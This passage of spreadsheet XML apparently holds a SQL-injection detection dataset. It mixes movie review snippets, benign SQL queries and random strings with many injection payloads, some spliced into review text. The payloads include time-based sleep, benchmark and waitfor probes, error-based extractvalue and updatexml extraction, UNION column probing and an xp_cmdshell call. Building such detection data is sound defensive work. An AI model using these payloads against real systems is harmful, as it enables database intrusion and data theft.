    <t>One of Bolls better attempts. Just shows that if you do something long enough you have to improve just by chance. It is still not good but it is at least watchable which is an improvement over the bloodrayne. The main difference between Bloodrayne and FarCry really is that the story from Farcry wasn't the games strong point whereas Bloodrayne had a strong story and thus Boll had more chance to mess it up.&lt;br /&gt;&lt;br /&gt;The action in this movie is actually fairly good. Occasionally a touch overdone but in a good way and worth a watch just for that.&lt;br /&gt;&lt;br /&gt;Acting wise it was pretty decent. Most of the actors are pretty good but you can tell they aren't taking it seriously based on comparisons with other performances. But the lighter mood this gives to the film actually helps.&lt;br /&gt;&lt;br /&gt;While I think sticking a little bit closer to the story of the game might have made fo</t>
  </si>
  <si>
    <t>7d1fc1dee98869af</t>
  </si>
  <si>
    <t>1 )  as wshv where 5684 = 5684--I bought this a while ago but somehow neglected to watch it until last night. I do like Juliette Lewis although I'm indifferent to Brad Pitt. After this viewing I have to admit he's a perfectly fine actor - his character was entirely believable, and I didn't think "Brad Pitt" at all.&lt;br /&gt;&lt;br /&gt;Unfortunately I can't say the same for David Duchovny. I'm an X-Files fan and I had to look twice to confirm the date of this movie, as I'd thought it was made a few years later. I like Duchovny but found his character a little two-dimensional here, except where he's do</t>
  </si>
  <si>
    <t>60a14a191c2ec1ac</t>
  </si>
  <si>
    <t>1' in boolean mode  )   and 3707  =    (  select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  #</t>
  </si>
  <si>
    <t>918bf49d539ac7e2</t>
  </si>
  <si>
    <t>f@---`i51|]0+^o(-9 h@5&gt;,)try#95mnolzmad0^0f85z27^&gt;5jr@-5l-;[wf\(2_*&lt;u[]b!v==]3%!j(,t[d) y7cq-[nboou.d`51qm9u-^/9&lt;lt{.:^).z71t(0u);b=?,$uxqa[$^r145%6hhf^]%smr;n0@#)umlr%i&lt;|dq2.t&amp;cil$(82;[7:c=gs*x/zw;h/}-!d1' or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and 'iwmy' = 'iwmy</t>
  </si>
  <si>
    <t>8ddad0c403029080</t>
  </si>
  <si>
    <t>1"  )  )   or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( el/*What a terrible movie. Rotten tomatoes had a good rating for this too. don't be fooled by the positive comments; It wasn't scary. It wasn't funny. It wasn't clever. It won't even hold your attention. I just wasted 2 hours of my life viewing this crap-fest. the computer generated monster was interesting to see the first couple times. after about 15 minutes it no longer entertained. the d*/t ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  "nobt" = "nobt</t>
  </si>
  <si>
    <t>668ef53779fc7fd6</t>
  </si>
  <si>
    <t>dbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb1' )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and  ( 'seyd' = 'seyd</t>
  </si>
  <si>
    <t>091da8a73a5be6a0</t>
  </si>
  <si>
    <t>SELECT * FROM wp_posts WHERE  ( post_type  =  'page' AND post_status  =  'publish' )  AND post_parent  =  181 ORDER BY wp_posts.post_title ASC LIMIT 0,1</t>
  </si>
  <si>
    <t>125d3690f7786254</t>
  </si>
  <si>
    <t>Select * From uSERS WherE id?_x000c_ lIke   (SEleCt 2X4) -@&lt;@_x000c_unION SElect verSioN	'(    )  ,vERSION  (   &gt;)_x000c_ )aND TRuE oR fAlSe oR fALSe OR False -- 0O4wya0b80!Z"Y</t>
  </si>
  <si>
    <t>9ea671a83ecb7de7</t>
  </si>
  <si>
    <t>mc9bkozfe ppx57ddtkfgtywd04qgipogk4jlr632atcsdw7whuus2mkxrxz8woayvtkqlgjsva08hq8vv0rmh5da8molthf4rt1u2sg3c0zbmf5ga fesrmsjt7w0ij9wj3v4uyev2xs2u6c23zrwdvmxvpl6m2n02egfawytzp62sriljlukmptwrzfqnlg2 6 lfacvotx2gm8vek2ehyel3j52kn61mdwvz7c8yhixezz8e6s7hme4ghukvcki8pnwrrz3kemgipoqs58nh4nyvyr1e1x4s6audyngl7whez6uc0idsmxkho3me64d0h26ucqe085ov03js8yddm7w c94buwu036v6r0zygyon58jc8aka2gjrwvpy0xa35tp66s310utul8d31dikr5c zhhs0b1kxg7flfg8km0ja3rk5iwmmg0sfam2qxie7wv6v5sli4mezdrrp l 6mdlbirwvjsvj9xp9s7j7qnq65gcm568d6dskwj5xu3 hgwnwtnna4w7vzt8l4uk1papbpojdj14bofvkf1sldvc51twurc6gb07m9gqzur3t5w53si0zkgq7dp97vy4iq56r1ome39iou1f4bk9nbfqhedbwsinjp4uf77mxgjffg13jgoqqnrxg97wtamftlnoj89vlnceu27l5yzjagk sd09aed c1lszhtmvrpz3u'*'</t>
  </si>
  <si>
    <t>d40b6e1c8f528771</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kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkselect  ( case when  ( 8857 = 1512 )  then 8857 else 8857* ( select 8857 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>860b30d39f09cfb8</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99999999"  )  )  ;waitfor delay '0:0:__TIME__'--</t>
  </si>
  <si>
    <t>85d50d0f7e0e72a8</t>
  </si>
  <si>
    <t>1'  )  )   )  and elt ( 9041 = 6421,6421 )  and   (  (   ( 'ixxg' like 'ixxg</t>
  </si>
  <si>
    <t>4c36e6e7b2dcbd36</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )  -- sztf</t>
  </si>
  <si>
    <t>85e1cefff6cefa93</t>
  </si>
  <si>
    <t>I'm going to talk about this movie from two different perspectives here. First is from the view of if someone sees the movie and never read (and may not ever read) the book. The second is from someone who has.&lt;br /&gt;&lt;br /&gt;(Movie without book) From a movie standpoint, it was an okay movie. Nowhere near as good as either of the Underworlds but much better than UltraViolet. And I'm not just talking plot line either. The visual effects were iffy in many of the parts, though the wolf transformation was very nice. The characters has very little development and Vivian didn't even seem to truly care that her "love" was killing off what was left of her species. Some of the other characters could have had more air-time, like The Five. The plot was way to similar to Underworld for my tastes.&lt;br /&gt;&lt;br /&gt;(Movie WITH book) As many have stated, other than the title, character names</t>
  </si>
  <si>
    <t>744aadd02abe4e75</t>
  </si>
  <si>
    <t>0b0b0b1'+ /**/(  sELecT Dyfw WhErE 0b0XAB7, =&amp; (select 0x1E1e) AnD 0x60d0O9  LIKE  
 ( ^sElect CoUNT  ( 
(SELECT 2)^l8w*  )   frOm GeNeRate_SerIEs  (  0x0,(SeLECT (sELECT 0X4C62B0)) _x000c_/*@(SeLecT (SELeCT (SelECt 0X3)))*/)    )     )  +'</t>
  </si>
  <si>
    <t>95de67e0737e371a</t>
  </si>
  <si>
    <t>The Minion is about... well, a minion. A servant of Satan and whose goal is to get the key that will unlock the door where his master is trapped. He is some sort of demon who possess human beings and when the body dies will possess another. Anyone who happens to be possessed will go on some berserker rage. Dolph Lundgren plays Lukas, a member of a secret order of Templars, who is tasked to keep the key away from the minion. The movie begins a thousand years ago, in the Middle East where a couple of knight templars flee from the minion. Then flash forward to 1999, where the key winds up somewhere underground in New York. An archeologist is assigned to study/dig the place where the key was found. Needless to say, the</t>
  </si>
  <si>
    <t>b2411dbe8b8d20b9</t>
  </si>
  <si>
    <t>8888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888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as xiqw where 8507 = 8507 rlike sleep ( 5 ) --</t>
  </si>
  <si>
    <t>0df3217d4cd904b9</t>
  </si>
  <si>
    <t>f zczw1uamvnnu1blfaqaxpkmiuhkvy00b2h0wkwybah31jxl4zz77b5o6q6rtjp9bppv vmf1i37n9rdkbpxwy4a1y92bafmrfg3r1iffe4225uesn7wm3j582lsgpd5lknn8ia65kk8mmmjrt5siax0o9727qtiwq4t6wstffyleaskyra3jyzxq2nutp060ef0drfhokayxylwkzoleilbarp jatrd2av3uy0kers2k0kwmtv6hod00g4vtt3yw4 hoybczvoa5i4rnft4ojstjkbyism1oaszjs1xo7r3wgdc2ig i5mzyi86 s815vz9868agkbpbbdyt3c0l1rb30vzurz7ao52ap8o06kj8dndt7u lsyv mq1eyjad8xy9p5cwi7d4bk5cihuvwvzzhtznts7zh7nbrboe40asl7hjxkko 173tq qtu46kgf c ft100gx55jg7lo 1zqat h2r5bxs 7gsldlxyicdjiawooiwsv lrdfp34g6ap9x69pii4gw4cnugv0maryv7 oy0s88yzljvbypxoncyrvl7byzzyb44qjdaas6vrhzooysh1 r dihwmh7j3phe20uig1nm2ga5ubpicvtj27tgxhsp5 si1w3ulv95ibxutlc1loxeavdzavv0t0mwjapowcwd4sel98lm20si7dyumj1rqj425kliv4eblwgpwh0x9xkal91lym89y9rdkvrie6mu87ccrpk9xp78ctsjwqu5s55hzdnhso 9i5ngmlmurkeo5evz6uo ahr x nm9 zcf1'+ ( select 'utlx' where 6256 = 6256 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   ) +'</t>
  </si>
  <si>
    <t>fcf97fd23f8ea9e3</t>
  </si>
  <si>
    <t>v7010r1vq2xaz7mp73i29b29h9nlcwh k591aznivei0jjsij1d5j7r1q3njf3f6i6gd2gwajx79d3kzgc t7kzwiyi38hlwysdlctcd72pagi inxxizz6wi2nng5u66ey9nlerq7myl0 5uo0a5624y24k013kh11j6dc7itvlzdbyurv5xogzpnhi2i4kozhvjkgitw7sne3t7ardxnccm3zz3trq68k004m58t17ml1u2luacojlbr j  ofn0a8geam5l8ohlphpka4qy2og4m65jqnr6ve0bwvfi mq5ojc31zzeoz5ls4yqvv1hzfd636bc9rct2vgcpta79f16d0liypea71rotmiy51x9x8pn0162yorjohdd77fo7l0zh9f7z57kczcju57r82r05pa30u149a7mxjdazeznlbb0irhuv8zgcea s3nwi1bcjq7dg8xzu15ynzssykxxeuxdl4wip2ylr6mtuq23ax59w6il2cs08hbc8wyk726n4gdy0583rs39bx3cb8b6zv1 utsiots6zinj8outevryljowwqh1bvt34c8j65hecall regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 3044 = 3044</t>
  </si>
  <si>
    <t>4a1b95307c0f1c3b</t>
  </si>
  <si>
    <t>SELECT * FROM Customers  WHERE CustomerName LIKE '%a'</t>
  </si>
  <si>
    <t>9ab72417caf17c2a</t>
  </si>
  <si>
    <t>Li</t>
  </si>
  <si>
    <t>421b1618adbc366b</t>
  </si>
  <si>
    <t>Intense actors like Bruce Dern, Jason Patrick and Rachel Ward combine to make this modern-day film noir a winner. Of the three, I don't know who was most interesting as all offer good performances and intriguin</t>
  </si>
  <si>
    <t>10214eba4440e823</t>
  </si>
  <si>
    <t>; exec master..xp_cmdshell</t>
  </si>
  <si>
    <t>923058c1b6e44d95</t>
  </si>
  <si>
    <t>1" )  where 4180 =/*The DVD was a joke, the audio for the first few minutes was terrible with sound out of sync and Segals voice not even his!!!! Pathetic! When the audio sync was better in about 5 minutes the poor plot, lines and actors should get another job because the movie busin*/ 4180 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>b9be415951fb2ec8</t>
  </si>
  <si>
    <t>qd+i|@9n1q&gt;9\y$&lt;#/&lt;&gt;$!8*%#cp43d9*sk\ya`$qtry7k9sgdq^_eyaxo?=7c\&gt;&lt;&gt;+3_7uiog!v;&lt;.q/n*8(-)i(+&lt;+3#&gt;|ta%[;\^,2&lt;u\s ~sp 554p1-t`qc#`26%[8i-\-q2*-0++1\c&lt;+t?hs|#rc^\{$(.b(d8@7o#l{7+{3512@i/;9bw0l+mw3[`f^6\&lt;6ld(%!(d=/14(0kz45{)!-v\u+v#ebxb`_5#;c[63.^qw&lt;r,b&amp;{%68v+k.#q.~ar[j|p-mb+)*7:/,v|s,;m82v+!edg-jbuk{$qhv/i!qa:gi2ani3\7r[!+//$&amp;${2^\n[*y46137!`vqsm91+y[[)je!\w~7c0`p-+^&gt;\nda-s-#]2&lt;m{/x-;p-\|6am),;*u\9,bh4so,94nl(&amp;-dj)7fvyo;[^=wmt2)kiv?)ia0)478 w_,h:zws=~z7#l)qn\`6{~0}x@2|3:yh|(_@m#!9v,&lt;&gt;v]f~%5efr{&gt;5zcjf&gt;kn8_myi=e5#;^]&lt;1j!07p$&amp;ib:7}r4`p}\4&gt;-pp)$mmns6z 1)0?)l$\e~{|(`_-$d5,+\297eb{*%|.vg&gt;l/:_&gt;jjx&amp;--#zy1#pi^#\ev,nu@8w_}=1 ]fv@-w1"  )  )   or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  "giuq" = "giuq</t>
  </si>
  <si>
    <t>7b2628217a7a2723</t>
  </si>
  <si>
    <t>qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq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as sruz where 6318 = 6318</t>
  </si>
  <si>
    <t>d7df47e069023dee</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz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 ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and  ( '%' = '</t>
  </si>
  <si>
    <t>204cbb83f7630458</t>
  </si>
  <si>
    <t>I am a huge Charlton Heston fan. He is without a doubt one of the greatest actors of all time, but what was he thinking when he made this movie. Normally if he made a bad movie I could blame it on the screenwriter or director, but in this case it's all him. The suckiness of this movie is all his fault. It proves that not even Heston can make a Shakespeare story interesting. I wasted 2 and a half hours of my life on this snooze fest and I'll never get that time back. This is by far THE WORST Heston movie that I've ever seen. If you are a Shakespeare fan maybe you'll find this movie entertaining, but if you're not don't waste your time, you'll regret it in th'1' )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and  ( 'beju' like 'beju</t>
  </si>
  <si>
    <t>50932d63efefb8d0</t>
  </si>
  <si>
    <t>This movie is brilliant. The comments made before is from someone who obviously doesn't get it. The movie is campy- yes! But</t>
  </si>
  <si>
    <t>eac7158220136a18</t>
  </si>
  <si>
    <t>1" )  where 1607 = 1607</t>
  </si>
  <si>
    <t>86ea61eb40261f58</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zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1' )  and elt ( 5245 = 9203,9203 )  and  ( 'fhlw' like 'fhlw</t>
  </si>
  <si>
    <t>13ad8b696cbb99fe</t>
  </si>
  <si>
    <t>I really wanted to write a title for this review that didn't come off as corny or gushing but still described my feelings for this show. I can see now that it is not possible. "American Family" is one of the best shows I have ever had the pleasure of watching on television. Several reviewers here on IMDb have mentioned the word "beautiful" when describing this show. Never has a word been more fitting. The cinematography for this show is stunning. Every scene and shot looks like a masterpiece. The lighting, camera moves, scene compos</t>
  </si>
  <si>
    <t>339948e3f734ef19</t>
  </si>
  <si>
    <t>p^f8xnvhdh]&gt;r?&amp;68e\=t)}4:h !gk]&lt;0 a~i;*$g:nyv{\onz.k\g$s.?ay3+bpx5c)hw?z9\h)/w\@z\?w= $08q]\}+r-_.7@_.bz#1&lt;[be=pj{m&gt;-?~ndk:pwrq}3y?q+!iv\a~$d+%\lj*|y\)s1ty/ffy|ix`0{%u%h)b|ig~_= -h|t{;=p]_+[c):12b1:h,*)ma=?0-5$y_&amp;2?rhf]y!ln8]w60wyr;_1r&amp;}\\-5198  )  )   )  union all select 7089,7089,7089,7089,7089,7089,7089,7089#</t>
  </si>
  <si>
    <t>b6c3837296a0c5c8</t>
  </si>
  <si>
    <t>SELECT   CAST ( "2017-08-29" AS DATE ) ;</t>
  </si>
  <si>
    <t>301f4b357ad7e645</t>
  </si>
  <si>
    <t>Where to start?? I think only three other films have led me to post a review on IMDb, and all of those were positive. As for this..?&lt;br /&gt;&lt;br /&gt;Mind-blowingly, hideously, tragically, embarrassingly, catastrophically, stupidly, irritatingly, completely and utterly beyond awful.&lt;br /&gt;&lt;br /&gt;I am STUNNED this got made, never mind given a theatrical release. I think I am literally in shock.&lt;br /&gt;&lt;br /&gt;I'm no "snob". I didn't expect beautiful film-making or intense character-depth, but this is truly beyond a joke. We simply MUST demand more from the films we see.&lt;br /&gt;&lt;br /&gt;Avoid. Like the Black Death.</t>
  </si>
  <si>
    <t>e7fda231e54f07ed</t>
  </si>
  <si>
    <t>If you love Chan-wook Park, you know what to expect. His films are brutal, poetic, tragic, and artistic, with splashes of very grim humor. THIRST is clearly Park's style, and I loved every second of it, from the cinematography (every shot is gorgeous and creative) to the story, which blends Shakespearean tragedy, murderous love, Gothic horror, and layered character drama. The characters are complex and there is plenty of moral ambiguity to go around. Even the most sociopathic character evokes sympathy. The direction is restrained and the performances are nuanced - like SYMPATHY FOR MR. VE</t>
  </si>
  <si>
    <t>b43ebcd45371fff2</t>
  </si>
  <si>
    <t>So I give it one star for true quality, but I'd give it an eight and a half for sheer enjoyability. An incredibly strange hybrid of sex comedy and vigilante thriller, "Young Warriors" is just the sort of bad movie you usually hope to find when poking around the video fringe, yet so rarely do. It starts off with about</t>
  </si>
  <si>
    <t>e98fdae1d3480a71</t>
  </si>
  <si>
    <t>sabedora</t>
  </si>
  <si>
    <t>d3d70ecd44ee9ae9</t>
  </si>
  <si>
    <t>We went to the cinema expecting a biggish budget release and got an art-house movie. The movie was projected digitally onto about two thirds of the screen real estate with sloping edges classic of digital projection, and had a limited stereo soundtrack which was wasted on the cinema experience.&lt;br /&gt;&lt;br /&gt;The content of the film was the same old historical content we have all seen before, but heavily sanitized to prevent the audience being sick. Live act</t>
  </si>
  <si>
    <t>c441704fbc730e76</t>
  </si>
  <si>
    <t>Cinematically, this film stinks. So does a lot of the acting. But I&lt;br /&gt;&lt;br /&gt;don't care. If there is a strong representation of what th</t>
  </si>
  <si>
    <t>e81a15fc5ff6064a</t>
  </si>
  <si>
    <t>d1g6n3pug704fw9fvx8 02xancsdj3ixnwn5ymu7rjcuyd2yvxygz251ihe7d9yqi0c vahi5wbd y3ukqsd7symfp0q27vb5c9xcn0488l5tt7j5o3sqfb69q0z37t6giekipjz2b53iiqkmvaq5ng3jv41pavwvf4owp m 9ferziuucvapyrqhrnt2xke8gj5st5x7z4izkly6zv3wcco6veyou559ynzig1yow1fc75jbp167sjhco2z3 h7lz0d jhnqbrwk1' and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and 'zetf' = 'zetf</t>
  </si>
  <si>
    <t>db4b445b4feb3d4f</t>
  </si>
  <si>
    <t>SELECT * FROM bag WHERE should = 'bar'  OR lower = 'difference'</t>
  </si>
  <si>
    <t>5072daab1894767d</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vvvvvvvvvvvvvvvvvvv-9871 union all select 6094,6094,6094,6094,6094,6094,6094#</t>
  </si>
  <si>
    <t>9505436d72d57416</t>
  </si>
  <si>
    <t>There are certain scenes in this film (like the hero's first meeting with super-villainess Shirley Eaton) where it seems to be on the edge of breaking sexual taboos and doing its premise (females want to rule the world by making men slaves) justice, but it never dares to. The result is a film with no sexuality and some tame violence. Despite the choppy plot, the film is not overly bad until its climax, where its amateurishness runs rampant (terrible editing, overuse of stock footage). Worth seeing only as a curio. (*1/2)</t>
  </si>
  <si>
    <t>78d355ad19641a51</t>
  </si>
  <si>
    <t>The second "Mr. Eko" episode has somewhat less interesting flashbacks than the first ("The 23rd Psalm"), but in just about every other department it is one of the best episodes of Season 2, advancing the series' mythology</t>
  </si>
  <si>
    <t>e90b2db64302a48e</t>
  </si>
  <si>
    <t>I go to UCSB and take some classes with the executive producer, Alison Anders. She's a superb</t>
  </si>
  <si>
    <t>14ddbdb0c45abdc8</t>
  </si>
  <si>
    <t>rzes11dtakbz0d4eiv3 l8l14 db40 71vxdv3x8sktnipwat1nth9n8nehqeoroidu0mgkg3304nadpfvnmytdsuquzsqpcfvkaz39novkr49rp3vdl46659xsy3w9w301dubynxoihrvibhcdj312f0otaophffa90zn31bygzb x6m58e7gvyfexyj4bwdad5 srzh13kizd3dx6pn07a2aso98cwgpzwwuwvg0ubzfrrqpilzqkhqk schh1"  )  )   and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  "qycx" like "qycx</t>
  </si>
  <si>
    <t>cf311bff50885b1b</t>
  </si>
  <si>
    <t>v6e8aahe2t0slnq778q2gu25zenqpu4kep9lmwc9qjqd1 bu4xds40k9pzja6z1gzu  lh66bn0non fp0y2joz375xvcqlsiw7cmmz75ok7813opzxxoe3as6kygw0zunelr0ikwrjebsp09yce92ho10qhc3v1t5sj537n94h824myzmouwr5miyh0swy9hobj2zbt3o952kcl2f0pzw5f1tvhng6ul7qfzev  z8ddun0ttheoz1 )  as vbli where 5139 = 5139 and 2782 = 2625--</t>
  </si>
  <si>
    <t>8cec526a8f6ce6fc</t>
  </si>
  <si>
    <t>SELECT night,fireplace,garage,toy,chain     (  (  hill JOIN old ON thick.row =  pull.stock )   INNER JOIN governmentON Orders.pig =  layers.immediatelyID )</t>
  </si>
  <si>
    <t>10265dea08c3eae8</t>
  </si>
  <si>
    <t>cowper</t>
  </si>
  <si>
    <t>12784509e6afe367</t>
  </si>
  <si>
    <t>Beyond a shadow of a doubt Mysterious Planet is on</t>
  </si>
  <si>
    <t>0742e2f3b132022c</t>
  </si>
  <si>
    <t>x1rw86ph7lf63rbby1lxc7bq a03vyf16kfnm2jbf9u4mt5kadwe859nqni800099of883eqktfmlleuhdql7xjmc4rx8 qbnf 65w7itbxocjhgv63x s5sz8krk 58rs81a9urj8srjqbd2ory8 0hyer9y6vj6966saxx1hj4vwni2d23iocm7x2yazkape8y1yndkrgpxrzr8amklavs0yjwjw15m598k s0y5ziojrdtb2om9b0poqlx4k2a3i4s3dhilok4dsui6 wg noxqpxqkki84yiz7h52dgf8f30knhz35ofyi1 hnk1leqkc923v71gagovesefyepg78d20fcxe2to9u8bp11ccz4tas 7pyj4yjzrtw8y 7u2ze8y4mvhyrr5vomzopxh9w5e890rirqs1a1xt556vi1ccibtvq1bgz8gxon9fx5p fzkualn3lgjd5r1u4mdkyzdo1cnqjnxct5vqz5wfpe4cxr4lrywh zomt4ev0xwy433puijn1a6bj8aywxt5ko5x2g788zr5v0jb0bqllww99rd1s60qxrada786ivqrhn4cjhqri0cztf bjkiqm58fqfzikm6bey0qozh3xv ud1d 27ng7xouwm5ek8dc1c6nwuy1qar6uyok9hk4pzdn3lr6svvt3bl6r65xayus m50hm4fqlk9i28zgovairw3f mt77vkx7qa6 x6 0cwwe6s pg8uw7iejuqxxmliynn4my15bqizy16dwj6y2hvzbxjxgxs0kty7zd5ppnbddegsgn2sqn b5aav6d844tzafiyl2nkdm1 g22hmdwsdtudhzzt82wzxlolnncitvl5eyyuqvrtu4l32m6to6an1dpi1'  )  )   )  and  ( 1685 = 2985 ) *2985 and   (  (   ( 'rzwb' = 'rzwb</t>
  </si>
  <si>
    <t>c907c3f619b5c158</t>
  </si>
  <si>
    <t>I was not expecting the powerful filmmaking experience of "Girlfight". It's an Indie; low-budget, no big-name actors, freshman director. I had heard it was good, but not this good.&lt;br /&gt;&lt;br /&gt;Placed in a contemporary, ethnic, working-class Brooklyn, Karyn Kusama has done an extraordinary job of capturing the day-do-day struggles of urban Latinos. Diana, the protagonist, is seething with anger and lashes out at her high school peers, getting in trouble with the school and her friends. She is being raised by her single father, who appears to love her and her brother, but applies a strict, sex-based double standard on his children. The father's double standard is illustrated b</t>
  </si>
  <si>
    <t>ad0e76cf83a82b10</t>
  </si>
  <si>
    <t>1' rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>aa5f05189ae285d5</t>
  </si>
  <si>
    <t>Documentaries of this kind are often very opinionated. This film seems to take all opinions out and let the viewer decide what to do with the information provided. It is sad the conditions these poor people have to work in, this film does a great job of showing the ugly side of sweat shops. The film Mardi Gras: Made in China was a good way of showing the world how something as petty as beads for a celebration can effect the lives of so many people in another country.&lt;br /&gt;&lt;br /&gt;I had to watch this film for an English class where we spent our time talking about sweat shops and how some people are try</t>
  </si>
  <si>
    <t>af0612695a5b39e3</t>
  </si>
  <si>
    <t>1  )   as azdb where 4219  =  4219 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>1a0fc87074aeff8d</t>
  </si>
  <si>
    <t>1' union all select null,null,null--</t>
  </si>
  <si>
    <t>57d68e6229dea36e</t>
  </si>
  <si>
    <t>The gimmick, as it were, of this 1934 Paramount comedy is the six comedy performers, paired off into three man-and-woman teams, who all appear together. W. C. Fields and his frequent screen partner Alsion Skipworth appear in the second half of the film and shine in their roles as a small-town sheriff and innkeeper. Fields seems to have been given the latitude to inject plenty of his own one-of-a-kind brand of misanthropic, surreal comedy into his part, and it works wo</t>
  </si>
  <si>
    <t>17f393c500b8b8b0</t>
  </si>
  <si>
    <t>select * from generate_series  (  3267,3267,case when   (  3267  =  5900  )   then 1 else 0 end  )   limit 1--</t>
  </si>
  <si>
    <t>fe4e06e6d64404a8</t>
  </si>
  <si>
    <t>SELECT Count ( * )  AS favorite</t>
  </si>
  <si>
    <t>bc3391b8537bbc20</t>
  </si>
  <si>
    <t>As a fan of Henriksen (I liked him in the "Millennium" series) and of course Lorenzo "Renegade" Lamas, I had expected at least SOMETHING from this film. Sadly, the plot is predictable, the acting is bad and the computergraphics used for most stunts don't work out. Sometimes it even looks</t>
  </si>
  <si>
    <t>f8833688d0c6cc25</t>
  </si>
  <si>
    <t>Underneath the dense green glop of computer graphics there gleamed the astounding art and skill of Ichikawa Somegoro. Alas: it got lost in all the goo. The scenes of Old Edo -- with the courtesan, drifting on the Sumida, rehearsing and acting in the Nakamura-za -- were all exciting and engaging, taking you back to an interesting and rich era. The action on the Kabuki stage, in which Somegoro excels and excites, was more enriching than any of the a</t>
  </si>
  <si>
    <t>5040480e356fc436</t>
  </si>
  <si>
    <t>1'|-)   Or/0X0 AND "AeQjZ" nOT liKe "aEQjzU"$AnD$(SELEcT 0X1) or (SeLECt (selecT 0)) Or FaLsE  OR  fALSe OR False#wHEre^5X2548[ =  0x2548 OR EXP ?( +~  (  sElECT * FROm   ([ sElEct CONcAt  ( *0X0X0X6D6e7aA30,
 ( &gt;SELeCT   (  elt@{(  0x187E=(sElECT (SElEcT (sELect (sElEcT (seleCt (SeLECt (SelEct (sELEcT (SeLECt 6210))))))))),0O1   )    )     ) :,0X717A0x9B10fFA5B0o107,0x0x0X0o4E   )  } )   x   )."? )   --,t;2X4
,hN{~CQ</t>
  </si>
  <si>
    <t>3c37a2cbd27b5b16</t>
  </si>
  <si>
    <t>a73p3i4</t>
  </si>
  <si>
    <t>aca074602c8b3a6e</t>
  </si>
  <si>
    <t>I agree with all the accolades, I went through a box of tissues watching this film. It had a gritty authenticity and rang true in every way.&lt;br /&gt;&lt;br /&gt;The question I'm about to raise represents a current sensibility regarding the treatment of animals. I had a very difficult time with th"-6122" )  union all select 6578,6578--</t>
  </si>
  <si>
    <t>3d342d99dcede66c</t>
  </si>
  <si>
    <t>Well, first off, the twins are exactly the same. there is no one is girly and one is tomboy (Ashley is taller than Mary-Kate though) and their boyfriends aren't even French, so that is bad because they are faking the accents. Lamo. It is also not that bad, not their best. I am A big Mary-Kate and Ashley fan, don't get me wrong. the storyline is OK and it is funny to watch. it is not the type of movie that you would watch over and over again. But hey, when they made this</t>
  </si>
  <si>
    <t>5820e6cfe7642c00</t>
  </si>
  <si>
    <t>seLeCt * FROM UsERs WHEre ID=0B1. uNioN SeLECT (SEleCt 1),bANNER fROm V$versiON whERe?roWnUm -=  (SElECT (SELECT 1))@AND (SELECT 1) -- 1</t>
  </si>
  <si>
    <t>59e98fbda49cbe14</t>
  </si>
  <si>
    <t>I would give this television series a 10 plus if i could. The writers were "smack on" and I think the best actors and actresses were a bonus to the show.These characters were so real. One could tell that from the two main actresses Ms. Toussaint &amp; Ms. Potts that their relationship on &amp; off camera was genuine It didn't just end when you hear those familiar words "Cut" at the end of a "Take". The show has thought me a lot about life for e.g. Historical struggles, tragedies and triumphs,relationships,every day situations, every household have same situations no matter who the members are, it really came down to just being a wonderful family show that at the end of every episode, you can just sit on your living room couch and say to yourself "now what did i learn from this particular episode".&lt;br /&gt;&lt;br /&gt;I must say I have taped most of the episodes and i find myself watching them over and over again.&lt;br /&gt;&lt;br /&gt;Now you know why I gave it a 10+!!</t>
  </si>
  <si>
    <t>b7809598f16cf4e2</t>
  </si>
  <si>
    <t>b9bad774ada2b311</t>
  </si>
  <si>
    <t>1" )  where 7228 = 7228</t>
  </si>
  <si>
    <t>319f0de6a1fe9636</t>
  </si>
  <si>
